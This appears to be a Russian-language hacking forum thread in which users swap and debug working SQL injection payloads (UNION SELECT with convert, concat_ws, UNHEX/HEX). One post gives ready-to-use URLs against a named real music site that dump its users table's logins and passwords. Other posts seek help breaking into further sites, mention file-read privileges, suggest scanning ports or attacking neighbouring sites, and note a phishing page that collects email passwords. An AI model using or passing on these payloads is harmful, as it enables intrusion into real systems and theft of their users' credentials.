j0ker13 -1+union+select+convert(concat_ws(0x3a,version(),user(),database())+using+latin1)/* вот так должно прокатить )
http://www.vkavkaz.tu2.ru/ чеза говнофейк Регистрация: Внимание перед регистрацией вам надо авторезироваться: В целях безопасности ваших данных, для успешного авторезирования на нашем сайте, вам нужно вести E-MAIL почтового ящика, и его пароль!
2~!DoK_tOR!~ неа)) convert может тока один столбик кодировать или можна сделать так -1+union+select+convert(1,2,3,4,5,6,7+using+latin1)/* или нада каждый конвертировать?))
Я только не пойму, если ошибка: Зачем конвертировать в latin1 ? j0ker13 Вот так будет работать: convert(concat_ws(0x3a,User(),Database(),Version())+using+cp1251) если вам нравится с конверт заморачиваться, а вообще UNHEX(HEX(concat_ws(0x3a,User(),Database(),Version()))) универсально
jokester дык это понятна на счет Hex() а почему он ругается именно на Union?) кодировка же нужна тока при выводе колонки а не самой команде))
j0ker13 Учи английский А если нужен практический пример то в соседнем топике лежит инъекция: https://forum.antichat.ru/showpost.php?p=870637&postcount=6661 Попробуй её без конверта , и увидишь такую-же ошибку
2jokester ладна) по идее это правильно?) -1+union+select+convert(1,2,3,4,5,6,7,8,9,0,1,2+using+cp1251) но выдает ошибку ; check the manual that corresponds to your MySQL server version for the right syntax to use near '2,3,4,5,6,7,8,9,0,1,2 using cp1251)/* ORDER BY date DESC LIMIT 0
http://mp3db.ru/index.php?cid=9&subcid=-18+union+select+1,null,null,null,concat_ws(0x3a,User(),Database(),Version()),6,null,null,null,null,null,null/* http://mp3db.ru/index.php?cid=9&subcid=-18+union+select+1,null,null,null,count(*),6,null,null,null,null,null,null+from+users/* 14560 юзеров юзеры http://mp3db.ru/index.php?cid=9&subcid=-18+union+select+1,null,null,null,concat_ws(0x3a,login,passwd),6,null,null,null,null,null,null+from+users/* Выводятся все так что юзай лимит )
2jokester гг) спс) уже нашел эту базу)) еще вопрос) еси при лоад_файл не показывает ошибки и в принтабельном столбце пусто то однозначно нет файл_прив?)
народ, помогите плиз с этим: http://ashdoda.net/modules.php?name=Photo_Albums&file=show_photo&photo_id=%2724616 чо только не пытался, без результатов...
geforce, скачать исходники форума, поставить патчи и попробовать разобрать сорцы. Или, как вариант, подождать новую версию и в логах посмотреть какие ошибки исправили, может что и всплывет. Если не терпеться можешь порты просканить и узнать, что на них висит - вдруг бажное попадется или "соседний" сайт попытаться ломануть. Дюша и Devoldini, это так будет cmd -> cd с:\perl\bin\; perl.exe 1.pl Хотя у меня когда Винда стояла, хватало команды perl 1.pl и всё запускалось
